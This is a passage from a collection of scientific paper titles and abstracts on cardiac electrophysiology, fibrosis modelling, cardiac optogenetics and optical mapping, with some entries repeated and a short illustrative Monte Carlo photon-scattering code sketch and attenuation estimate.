two remains elusive. This study used an array of 3D computational models with different representations of fibrosis based on a patient-specific atrial geometry with accurate fibrotic distribution to determine the mechanisms by which fibrosis underlies the degradation of a pulmonary vein ectopic beat into AF. Fibrotic lesions in models were represented with combinations of: gap junction remodeling; collagen deposition; and myofibroblast proliferation with electrotonic or paracrine effects on neighboring myocytes. The study found that the occurrence of gap junction remodeling and the subsequent conduction slowing in the fibrotic lesions was a necessary but not sufficient condition for AF development, whereas myofibroblast proliferation and the subsequent electrophysiological effect on neighboring myocytes within the fibrotic lesions was the sufficient condition necessary for reentry formation. Collagen did not alter the arrhythmogenic outcome resulting from the other fibrosis components.
Reentrant circuits formed throughout the noncontiguous fibrotic lesions, without anchoring to a specific fibrotic lesion. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: NOTES ON CONTINUOUS STOCHASTIC PHENOMENA paper_content: The study of stochastic processes has naturally led to the consideration of stochastic phenomena which are distributed in space of two or more dimensions. Such investigations are, for instance, of practical interest in connexion with problems concerning the distribution of soil fertility over a field or the relations between the velocities at different points in a turbulent fluid. A review of such work with many references has recently been given by Ghosh (1949) (see also Matern, 1947). In the present note I consider two problems arising in the twoand three-dimensional cases. --- paper_title: Interactions between cardiac fibrosis spatial pattern and ionic remodeling on electrical wave propagation paper_content: Cardiac fibrosis is an important form of pathological tissue remodeling. Fibrosis can electrically-uncouple neighboring excitable cardiomyocytes thus acting as an obstacle to electrical propagation. In this study, we investigated the effects of fibrosis spatial pattern on electrical propagation in control, decreased maximum sodium conductance, and increased intracellular resistivity conditions. Simulations were performed with a monodomain approach and a realistic canine ionic model. We found that the propagation failure is highly dependent on the spatial pattern of fibrosis for all conditions studied with maximum sensitivity for patterns with combination of small and large clusters. However, the effect is particularly sensitive to reduced sodium current condition where conduction block occurred at lower fibrosis density. --- paper_title: Finding Fluorescent Needles in the Cardiac Haystack: Tracking Human Mesenchymal Stem Cells Labeled with Quantum Dots for Quantitative In Vivo Three-Dimensional Fluorescence Analysis paper_content: Stem cells show promise for repair of damaged cardiac tissue. Little is known with certainty, however, about the distribution of these cells once introduced in vivo. 
Previous attempts at tracking delivered stem cells have been hampered by the autofluorescence of host tissue and limitations of existing labeling techniques. We have developed a novel loading approach to stably label human mesenchymal stem cells with quantum dot (QD) nanoparticles. We report the optimization and validation of this long-term tracking technique and highlight several important biological applications by delivering labeled cells to the mammalian heart. The bright QD crystals illuminate exogenous stem cells in histologic sections for at least 8 weeks following delivery and permit, for the first time, the complete three-dimensional reconstruction of the locations of all stem cells following injection into the heart. --- paper_title: A single direct injection into the left ventricular wall of an adeno-associated virus 9 (AAV9) vector expressing extracellular superoxide dismutase from the cardiac troponin-T promoter protects mice against myocardial infarction paper_content: BACKGROUND: Localized administration of a highly efficient gene delivery system in combination with a cardiac-selective promoter may provide a favorable biosafety profile in clinical applications such as coronary artery bypass graft surgery, where regions of myocardium can be readily injected to protect them against the potential threat of future ischemic events. METHODS: Adeno-associated virus (AAV) vectors expressing luciferase or enhanced green fluorescent protein (eGFP) packaged into AAV serotypes 1, 2, 6, 8 and 9 were injected into the left ventricular (LV) wall of adult mice to determine the time course, magnitude and distribution of gene expression. An AAV9 vector expressing extracellular superoxide dismutase (EcSOD) from the cardiac troponin T (cTnT) promoter was then directly injected into the LV wall of adult mice. Myocardial infarction was induced 4 weeks after injection and infarct size was determined by triphenyltetrazolium chloride and phthalo blue staining. RESULTS: Serotypes AAV 9, 8, 1 and 6 provided early onset of gene expression in the heart with minimal extra-cardiac gene expression. AAV9 provided the highest magnitude of gene expression. Immunostaining for eGFP showed expression spanning the anterior to posterior walls from the mid ventricle to the apex. A single direct injection of the AAV9 vector bearing EcSOD (n = 5) decreased the mean infarct size by 50% compared to the eGFP control group (n = 8) (44 ± 7% versus 22 ± 5%; p = 0.04). CONCLUSIONS: AAV serotype 9 is highly efficient for cardiac gene delivery, as evidenced by early onset and high-level gene expression. AAV9-mediated, cardiac selective overexpression of EcSOD from the cTnT promoter significantly reduced infarct size in mice. --- paper_title: Robust cardiomyocyte-specific gene expression following systemic injection of AAV: in vivo gene delivery follows a Poisson distribution paper_content: Robust cardiomyocyte-specific gene expression following systemic injection of AAV: in vivo gene delivery follows a Poisson distribution --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins).
This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Toward microendoscopy-inspired cardiac optogenetics in vivo: technical overview and perspective paper_content: The ability to perform precise, spatially localized actuation and measurements of electrical activity in the heart is crucial in understanding cardiac electrophysiology and devising new therapeutic solutions for control of cardiac arrhythmias. Current cardiac imaging techniques (i.e. optical mapping) employ voltage- or calcium-sensitive fluorescent dyes to visualize the electrical signal propagation through cardiac syncytium in vitro or in situ with very high-spatiotemporal resolution. The extension of optogenetics into the cardiac field, where cardiac tissue is genetically altered to express light-sensitive ion channels allowing electrical activity to be elicited or suppressed in a precise cell-specific way, has opened the possibility for all-optical interrogation of cardiac electrophysiology. In vivo application of cardiac optogenetics faces multiple challenges and necessitates suitable optical systems employing fiber optics to actuate and sense electrical signals. In this technical perspective, we present a compendium of clinically relevant access routes to different parts of the cardiac electrical conduction system based on currently employed catheter imaging systems and determine the quantitative size constraints for endoscopic cardiac optogenetics. We discuss the relevant technical advancements in microendoscopy, cardiac imaging, and optogenetics and outline the strategies for combining them to create a portable, miniaturized fiber-based system for all-optical interrogation of cardiac electrophysiology in vivo. --- paper_title: Cardiac Electromechanical Models: From Cell to Organ paper_content: The heart is a multiphysics and multiscale system that has driven the development of the most sophisticated mathematical models at the frontiers of computation physiology and medicine. This review focuses on electromechanical (EM) models of the heart from the molecular level of myofilaments to anatomical models of the organ. Because of the coupling in terms of function and emergent behaviors at each level of biological hierarchy, separation of behaviors at a given scale is difficult. Here, a separation is drawn at the cell level so that the first half addresses subcellular/single cell models and the second half addresses organ models. At the subcelluar level, myofilament models represent actin-myosin interaction and Ca-based activation. Myofilament models and their refinements represent an overview of the development in the field. 
The discussion of specific models emphasizes the roles of cooperative mechanisms and sarcomere length dependence of contraction force, considered the cellular basis of the Frank-Starling law. A model of electrophysiology and Ca handling can be coupled to a myofilament model to produce an EM cell model, and representative examples are summarized to provide an overview of the progression of field. The second half of the review covers organ-level models that require solution of the electrical component as a reaction-diffusion system and the mechanical component, in which active tension generated by the myocytes produces deformation of the organ as described by the equations of continuum mechanics. As outlined in the review, different organ-level models have chosen to use different ionic and myofilament models depending on the specific application; this choice has been largely dictated by compromises between model complexity and computational tractability. The review also addresses application areas of EM models such as cardiac resynchronization therapy and the role of mechano-electric coupling in arrhythmias and defibrillation. --- paper_title: "Beauty is a light in the heart": the transformative potential of optogenetics for clinical applications in cardiovascular medicine. paper_content: Optogenetics is an exciting new technology in which viral gene or cell delivery is used to inscribe light sensitivity in excitable tissue to enable optical control of bioelectric behavior. Initial progress in the fledgling domain of cardiac optogenetics has included in vitro expression of various light-sensitive proteins in cell monolayers and transgenic animals to demonstrate an array of potentially useful applications, including light-based pacing, silencing of spontaneous activity, and spiral wave termination. In parallel to these developments, the cardiac modeling community has developed a versatile computational framework capable of realistically simulating optogenetics in biophysically detailed, patient-specific representations of the human heart, enabling the exploration of potential clinical applications in a predictive virtual platform. Toward the ultimate goal of assessing the feasibility and potential impact of optogenetics-based therapies in cardiovascular medicine, this review provides (1) a detailed synopsis of in vivo, in vitro, and in silico developments in the field and (2) a critical assessment of how existing clinical technology for gene/cell delivery and intra-cardiac illumination could be harnessed to achieve such lofty goals as light-based arrhythmia termination. --- paper_title: Visualizing excitation waves inside cardiac muscle using transillumination. paper_content: Voltage-sensitive fluorescent dyes have become powerful tools for the visualization of excitation propagation in the heart. However, until recently they were used exclusively for surface recordings. Here we demonstrate the possibility of visualizing the electrical activity from inside cardiac muscle via fluorescence measurements in the transillumination mode (in which the light source and photodetector are on opposite sides of the preparation). This mode enables the detection of light escaping from layers deep within the tissue. Experiments were conducted in perfused (8 mm thick) slabs of sheep right ventricular wall stained with the voltage-sensitive dye di-4-ANEPPS. 
Although the amplitude and signal-to-noise ratio recorded in the transillumination mode were significantly smaller than those recorded in the epi-illumination mode, they were sufficient to reliably determine the activation sequence. Penetration depths (spatial decay constants) derived from measurements of light attenuation in cardiac muscle were 0.8 mm for excitation (520 ± 30 nm) and 1.3 mm for emission wavelengths (640 ± 50 nm). Estimates of emitted fluorescence based on these attenuation values in 8-mm-thick tissue suggest that 90% of the transillumination signal originates from a 4-mm-thick layer near the illuminated surface. A 69% fraction of the recorded signal originates from ≥1 mm below the surface. Transillumination recordings may be combined with endocardial and epicardial surface recordings to obtain information about three-dimensional propagation in the thickness of the myocardial wall. We show an example in which transillumination reveals an intramural reentry, undetectable in surface recordings. --- paper_title: 3D multifunctional integumentary membranes for spatiotemporal cardiac measurements and stimulation across the entire epicardium paper_content: Tools for cardiac physiological mapping are important for basic and clinical cardiac research. Here the authors use 3D printing to create a thin, elastic silicone sheath that fits tightly around the entire epicardium and contains sensors to measure a variety of physiological parameters of the beating heart ex vivo. --- paper_title: Quantifying spatial localization of optical mapping using Monte Carlo simulations paper_content: Optical mapping techniques used to study spatial distributions of cardiac activity can be divided into two categories: (1) broad-field excitation method, in which hearts stained with voltage or calcium sensitive dyes are illuminated with broad-field excitation light and fluorescence is collected by image or photodiode arrays; (2) laser scanning method, in which illumination uses a scanning laser and fluorescence is collected with a photomultiplier tube. The spatial localization of the fluorescence signal for these two methods is unknown and may depend upon light absorption and scattering at both excitation and emission wavelengths. We measured the absorption coefficients (μa), scattering coefficients (μs), and scattering anisotropy coefficients (g) at representative excitation and emission wavelengths in rabbit heart tissue stained with di-4-ANEPPS or co-stained with both Rh237 and Oregon Green 488 BAPTA 1. Monte Carlo models were then used to simulate absorption and scattering of excitation light and fluorescence emission light for both broad-field and laser methods in three-dimensional tissue. Contributions of local emissions throughout the tissue to fluorescence collected from the tissue surface were determined for both methods. Our results show that spatial localization depends on the light absorption and scattering in tissue and on the optical mapping method that is used. A tissue region larger than the laser beam or collecting area of the array element contributes to the optical recordings.
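The Monte Carlo photon-transport approach summarized in the preceding abstract can be sketched compactly in code. The Python fragment below is a reduced, purely illustrative one-dimensional photon-packet random walk, not the authors' implementation: the optical coefficients are placeholder values of a plausible order of magnitude for cardiac tissue, only the depth coordinate is tracked, and the depth at which an excitation packet is absorbed is used as a crude proxy for where fluorescence would be generated.

```python
import numpy as np

# Minimal illustrative Monte Carlo photon-packet sketch (not the published code).
# mu_a, mu_s are absorption/scattering coefficients (1/mm); g is the scattering
# anisotropy. The values below are placeholders of a plausible magnitude only.
MU_A, MU_S, G = 0.5, 20.0, 0.95
MU_T = MU_A + MU_S                      # total interaction coefficient (1/mm)
SLAB = 8.0                              # slab thickness in mm

rng = np.random.default_rng(0)

def sample_hg_cosine(g):
    """Sample cos(theta) from the Henyey-Greenstein phase function."""
    if g == 0.0:
        return 2.0 * rng.random() - 1.0
    s = (1.0 - g * g) / (1.0 - g + 2.0 * g * rng.random())
    return (1.0 + g * g - s * s) / (2.0 * g)

def absorption_depths(n_packets=20000):
    """Depths (mm) at which excitation packets are absorbed in a 1-D slab.

    The absorption depth serves as a crude proxy for where fluorescence is
    generated, i.e. for the spatial-localization question studied above."""
    depths = []
    for _ in range(n_packets):
        z, uz = 0.0, 1.0                               # enter at z = 0, heading inward
        while True:
            step = -np.log(1.0 - rng.random()) / MU_T  # exponential free path
            z += uz * step
            if z < 0.0 or z > SLAB:                    # packet escaped the slab
                break
            if rng.random() < MU_A / MU_T:             # absorbed here
                depths.append(z)
                break
            cos_t = sample_hg_cosine(G)                # scattered: update z-direction
            sin_t = np.sqrt(max(0.0, 1.0 - cos_t**2))
            phi = 2.0 * np.pi * rng.random()
            uz = uz * cos_t + np.sqrt(max(0.0, 1.0 - uz**2)) * sin_t * np.cos(phi)
            uz = min(1.0, max(-1.0, uz))
    return np.array(depths)

d = absorption_depths()
print(f"median absorption depth: {np.median(d):.2f} mm "
      f"(90th percentile: {np.percentile(d, 90):.2f} mm)")
```

Extending such a sketch to launch emission packets from the fluorescence sources toward a detector, or to spatially varying coefficients on a tetrahedral mesh as in the following abstract, amounts to the same random walk with more bookkeeping.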
--- paper_title: Simulating photon scattering effects in structurally detailed ventricular models using a Monte Carlo approach paper_content: Light scattering during optical imaging of electrical activation within the heart is known to significantly distort the optically-recorded action potential (AP) upstroke, as well as affecting the magnitude of the measured response of ventricular tissue to strong electric shocks. Modelling approaches based on the photon diffusion equation have recently been instrumental in quantifying and helping to understand the origin of the resulting distortion. However, they are unable to faithfully represent regions of non-scattering media, such as small cavities within the myocardium which are filled with perfusate during experiments. Stochastic Monte Carlo (MC) approaches allow simulation and tracking of individual photon 'packets' as they propagate through tissue with differing scattering properties. Here, we present a novel application of the MC method of photon scattering simulation, applied for the first time to the simulation of cardiac optical mapping signals within unstructured, tetrahedral, finite element computational ventricular models. The method faithfully allows simulation of optical signals over highly-detailed, anatomically-complex MR-based models, including representations of fine-scale anatomy and intramural cavities. We show that the optical action potential upstroke is more prolonged close to large subepicardial vessels than further away from them, at times having a distinct 'humped' morphology. Furthermore, we uncover a novel mechanism by which photon scattering effects around vessel cavities interact with 'virtual-electrode' regions of strong de-/hyper-polarised tissue surrounding cavities during shocks, significantly reducing the apparent optically-measured epicardial polarisation. We therefore demonstrate the importance of this novel optical mapping simulation approach along with highly anatomically-detailed models to fully investigate electrophysiological phenomena driven by fine-scale structural heterogeneity. --- paper_title: Synthesis of voltage-sensitive optical signals: application to panoramic optical mapping. paper_content: Fluorescent photon scattering is known to distort optical recordings of cardiac transmembrane potentials; however, this process is not well quantified, hampering interpretation of experimental data. This study presents a novel model, which accurately synthesizes fluorescent recordings over the irregular geometry of the rabbit ventricles. Using the model, the study aims to provide quantification of fluorescent signal distortion for different optical characteristics of the preparation and of the surrounding medium. A bi-domain representation of electrical activity is combined with finite element solutions to the photon diffusion equation simulating both the excitation and emission processes, along with physically realistic boundary conditions at the epicardium, which allow simulation of different experimental setups. We demonstrate that distortion in the optical signal as a result of fluorescent photon scattering is truly a three-dimensional phenomenon and depends critically upon the geometry of the preparation, the scattering properties of the tissue, the direction of wavefront propagation, and the specifics of the experimental setup.
Importantly, we show that in an anatomically accurate model of ventricular geometry and fiber orientation, the morphology of the optical signal does not provide reliable information regarding the intramural direction of wavefront propagation. These findings underscore the potential of the new model in interpreting experimental data. --- paper_title: Whole-Heart Modeling: Applications to Cardiac Electrophysiology and Electromechanics paper_content: Recent developments in cardiac simulation have rendered the heart the most highly integrated example of a virtual organ. We are on the brink of a revolution in cardiac research, one in which computational modeling of proteins, cells, tissues, and the organ permit linking genomic and proteomic information to the integrated organ behavior, in the quest for a quantitative understanding of the functioning of the heart in health and disease. The goal of this review is to assess the existing state-of-the-art in whole-heart modeling and the plethora of its applications in cardiac research. General whole-heart modeling approaches are presented, and the applications of whole-heart models in cardiac electrophysiology and electromechanics research are reviewed. The article showcases the contributions that whole-heart modeling and simulation have made to our understanding of the functioning of the heart. A summary of the future developments envisioned for the field of cardiac simulation and modeling is also presented. Biophysically based computational modeling of the heart, applied to human heart physiology and the diagnosis and treatment of cardiac disease, has the potential to dramatically change 21st century cardiac research and the field of cardiology. --- paper_title: Shedding light onto live molecular targets paper_content: Optical sensing of specific molecular targets and pathways deep inside living mice has become possible as a result of a number of advances. These include design of biocompatible near-infrared fluorochromes, development of targeted and activatable 'smart' imaging probes, engineered photoproteins and advances in photon migration theory and reconstruction. Together, these advances will provide new tools making it possible to understand more fully the functioning of protein networks, diagnose disease earlier and speed along drug discovery. --- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. 
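A rough, purely illustrative cross-check of the transillumination figures quoted earlier in this list (penetration depths of 0.8 mm for excitation and 1.3 mm for emission in an 8-mm-thick slab) can be written down with a one-dimensional exponential-attenuation weighting of the fluorescence sources; it ignores lateral spreading and boundary effects, which the Monte Carlo and photon-diffusion models above treat properly.

```latex
% Back-of-the-envelope 1-D weighting of fluorescence sources in transillumination;
% an illustrative estimate, not the calculation performed in the cited study.
% First factor: excitation reaching depth z from the illuminated face (z = 0);
% second factor: emission escaping through the opposite face of a slab of thickness L = 8 mm.
\begin{align*}
  w(z) &\propto e^{-z/\delta_{\mathrm{ex}}}\, e^{-(L-z)/\delta_{\mathrm{em}}}
        \;\propto\; e^{-k z},
  \qquad k = \frac{1}{\delta_{\mathrm{ex}}}-\frac{1}{\delta_{\mathrm{em}}}
           \approx \frac{1}{0.8~\mathrm{mm}}-\frac{1}{1.3~\mathrm{mm}}
           \approx 0.48~\mathrm{mm^{-1}},\\[4pt]
  \frac{\int_{0}^{4\,\mathrm{mm}} w(z)\,dz}{\int_{0}^{8\,\mathrm{mm}} w(z)\,dz}
       &= \frac{1-e^{-(4\,\mathrm{mm})\,k}}{1-e^{-(8\,\mathrm{mm})\,k}} \approx 0.87 .
\end{align*}
```

This is close to the reported estimate that roughly 90% of the transillumination signal originates within 4 mm of the illuminated face. The same weighting also makes explicit why red light, which is attenuated less in tissue (larger effective penetration depth), samples deeper layers; that property is exploited by red-shifted opsins such as ReaChR described above.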
--- paper_title: Optogenetic versus Electrical Stimulation of Human Cardiomyocytes: Modeling Insights. paper_content: Optogenetics provides an alternative to electrical stimulation to manipulate membrane voltage, and trigger or modify action potentials (APs) in excitable cells. We compare biophysically and energetically the cellular responses to direct electrical current injection versus optical stimulation mediated by genetically expressed light-sensitive ion channels, e.g., Channelrhodopsin-2 (ChR2). Using a computational model of ChR2(H134R mutant), we show that both stimulation modalities produce similar-in-morphology APs in human cardiomyocytes, and that electrical and optical excitability vary with cell type in a similar fashion. However, whereas the strength-duration curves for electrical excitation in ventricular and atrial cardiomyocytes closely follow the theoretical exponential relationship for an equivalent RC circuit, the respective optical strength-duration curves significantly deviate, exhibiting higher nonlinearity. We trace the origin of this deviation to the waveform of the excitatory current—a nonrectangular self-terminating inward current produced in optical stimulation due to ChR2 kinetics and voltage-dependent rectification. Using a unifying charge measure to compare energy needed for electrical and optical stimulation, we reveal that direct electrical current injection (rectangular pulse) is more efficient at short pulses, whereas voltage-mediated negative feedback leads to self-termination of ChR2 current and renders optical stimulation more efficient for long low-intensity pulses. This applies to cardiomyocytes but not to neuronal cells (with much shorter APs). Furthermore, we demonstrate the cell-specific use of ChR2 current as a unique modulator of intrinsic activity, allowing for optical control of AP duration in atrial and, to a lesser degree, in ventricular myocytes. For self-oscillatory cells, such as Purkinje, constant light at extremely low irradiance can be used for fine control of oscillatory frequency, whereas constant electrical stimulation is not feasible due to electrochemical limitations. Our analysis offers insights for designing future new energy-efficient stimulation strategies in heart or brain. --- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Quantifying spatial localization of optical mapping using Monte Carlo simulations paper_content: Optical mapping techniques used to study spatial distributions of cardiac activity can be divided into two categories; (1) broad-field excitation method, in which hearts stained with voltage or calcium sensitive dyes are illuminated with broad-field excitation light and fluorescence is collected by image or photodiode arrays; (2) laser scanning method, in which illumination uses a scanning laser and fluorescence is collected with a photomultiplier tube. The spatial localization of the fluorescence signal for these two methods is unknown and may depend upon light absorption and scattering at both excitation and emission wavelengths. 
We measured the absorption coefficients (μa), scattering coefficients (μs), and scattering anisotropy coefficients (g) at representative excitation and emission wavelengths in rabbit heart tissue stained with di-4-ANEPPS or co-stained with both Rh237 and Oregon Green 488 BAPTA 1. Monte Carlo models were then used to simulate absorption and scattering of excitation light and fluorescence emission light for both broad-field and laser methods in three-dimensional tissue. Contributions of local emissions throughout the tissue to fluorescence collected from the tissue surface were determined for both methods. Our results show that spatial localization depends on the light absorption and scattering in tissue and on the optical mapping method that is used. A tissue region larger than the laser beam or collecting area of the array element contributes to the optical recordings. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodopsin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance-dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Alternans and spiral breakup in human ventricular tissue model paper_content: Ventricular fibrillation (VF) is one of the main causes of death in the Western world. According to one hypothesis, the chaotic excitation dynamics during VF are the result of dynamical instabilities in action potential duration (APD), the occurrence of which requires that the slope of the APD restitution curve exceeds 1.
Other factors such as electrotonic coupling and cardiac memory also determine whether these instabilities can develop. In this paper we study the conditions for alternans and spiral breakup in human cardiac tissue. Therefore, we develop a new version of our human ventricular cell model, which is based on recent experimental measurements of human APD restitution and includes a more extensive description of intracellular calcium dynamics. We apply this model to study the conditions for electrical instability in single cells, for reentrant waves in a ring of cells, and for reentry in two-dimensional sheets of ventricular tissue. We show that an important determinant for the onset of instability is the recovery dynamics of the fast sodium current. Slower sodium current recovery leads to longer periods of spiral wave rotation and more gradual conduction velocity restitution, both of which suppress restitution-mediated instability. As a result, maximum restitution slopes considerably exceeding 1 (up to 1.5) may be necessary for electrical instability to occur. Although slopes necessary for the onset of instabilities found in our study exceed 1, they are within the range of experimentally measured slopes. Therefore, we conclude that steep APD restitution-mediated instability is a potential mechanism for VF in the human heart. --- paper_title: Ionic mechanisms underlying human atrial action potential properties: insights from a mathematical model paper_content: The mechanisms underlying many important properties of the human atrial action potential (AP) are poorly understood. Using specific formulations of the K+, Na+, and Ca2+ currents based on data recorded from human atrial myocytes, along with representations of pump, exchange, and background currents, we developed a mathematical model of the AP. The model AP resembles APs recorded from human atrial samples and responds to rate changes, L-type Ca2+ current blockade, Na+/Ca2+ exchanger inhibition, and variations in transient outward current amplitude in a fashion similar to experimental recordings. Rate-dependent adaptation of AP duration, an important determinant of susceptibility to atrial fibrillation, was attributable to incomplete L-type Ca2+ current recovery from inactivation and incomplete delayed rectifier current deactivation at rapid rates. Experimental observations of variable AP morphology could be accounted for by changes in transient outward current density, as suggested experimentally. We conclude that this mathematical model of the human atrial AP reproduces a variety of observed AP behaviors and provides insights into the mechanisms of clinically important AP properties. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications.
The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Computational Optogenetics: A Novel Continuum Framework for the Photoelectrochemistry of Living Systems paper_content: Electrical stimulation is currently the gold standard treatment for heart rhythm disorders. However, electrical pacing is associated with technical limitations and unavoidable potential complications. Recent developments now enable the stimulation of mammalian cells with light using a novel technology known as optogenetics. The optical stimulation of genetically engineered cells has significantly changed our understanding of electrically excitable tissues, paving the way towards controlling heart rhythm disorders by means of photostimulation. Controlling these disorders, in turn, restores coordinated force generation to avoid sudden cardiac death. Here, we report a novel continuum framework for the photoelectrochemistry of living systems that allows us to decipher the mechanisms by which this technology regulates the electrical and mechanical function of the heart. Using a modular multiscale approach, we introduce a non-selective cation channel, channelrhodopsin-2, into a conventional cardiac muscle cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, this channel opens and allows sodium ions to enter the cell, inducing electrical activation. In side-by-side comparisons with conventional heart muscle cells, we show that photostimulation directly increases the sodium concentration, which indirectly decreases the potassium concentration in the cell, while all other characteristics of the cell remain virtually unchanged. We integrate our model cells into a continuum model for excitable tissue using a nonlinear parabolic second order partial differential equation, which we discretize in time using finite differences and in space using finite elements. To illustrate the potential of this computational model, we virtually inject our photosensitive cells into different locations of a human heart, and explore its activation sequences upon photostimulation. Our computational optogenetics tool box allows us to virtually probe landscapes of process parameters, and to identify optimal photostimulation sequences with the goal to pace human hearts with light and, ultimately, to restore mechanical function. --- paper_title: Mapping of cardiac electrical activation with electromechanical wave imaging: an in silico-in vivo reciprocity study. paper_content: BACKGROUND: Electromechanical wave imaging (EWI) is an entirely noninvasive, ultrasound-based imaging method capable of mapping the electromechanical activation sequence of the ventricles in vivo. Given the broad accessibility of ultrasound scanners in the clinic, the application of EWI could constitute a flexible surrogate for the 3-dimensional electrical activation.
OBJECTIVE: The purpose of this report is to reproduce the electromechanical wave (EW) using an anatomically realistic electromechanical model, and establish the capability of EWI to map the electrical activation sequence in vivo when pacing from different locations. METHODS: EWI was performed in 1 canine during pacing from 3 different sites. A high-resolution dynamic model of coupled cardiac electromechanics of the canine heart was used to predict the experimentally recorded electromechanical wave. The simulated 3-dimensional electrical activation sequence was then compared with the experimental EW. RESULTS: The electrical activation sequence and the EW were highly correlated for all pacing sites. The relationship between the electrical activation and the EW onset was found to be linear, with a slope of 1.01 to 1.17 for different pacing schemes and imaging angles. CONCLUSION: The accurate reproduction of the EW in simulations indicates that the model framework is capable of accurately representing the cardiac electromechanics and thus testing new hypotheses. The one-to-one correspondence between the electrical activation and the EW sequences indicates that EWI could be used to map the cardiac electrical activity. This opens the door for further exploration of the technique in assisting in the early detection, diagnosis, and treatment monitoring of rhythm dysfunction. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. 